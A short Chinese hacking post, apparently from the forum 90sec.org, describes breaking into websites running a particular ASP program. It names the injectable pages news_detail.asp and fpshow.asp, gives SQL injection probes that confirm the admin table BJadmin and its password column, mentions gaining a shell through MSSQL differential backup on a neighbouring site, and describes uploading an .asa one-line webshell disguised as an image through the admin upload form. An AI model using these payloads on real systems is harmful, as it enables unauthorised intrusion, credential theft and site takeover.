By 老鬼 首发:90sec.org
用这程序的都是百度推广站。目标A站有注入点,搞不到表名。各种蛋痛的跳过,找了同程序的B站 旁了个站mssql差异备份拿到了同程序的B站shell。。down了程序。找到了表名。注入进后台拿到A站权限。目的达到。
注入文件:
news_detail.asp
fpshow.asp?Product_ParentID=4&Product_ID=31;-- 注入漏洞
and exists(select * from [BJadmin]) 表名
and exists(select [password] from [BJadmin]) 用户名是title这个字段里面
手工猜字段麻烦 用工具吧。
shell拿 就在后台 上传的地方传个 asa的图片一句话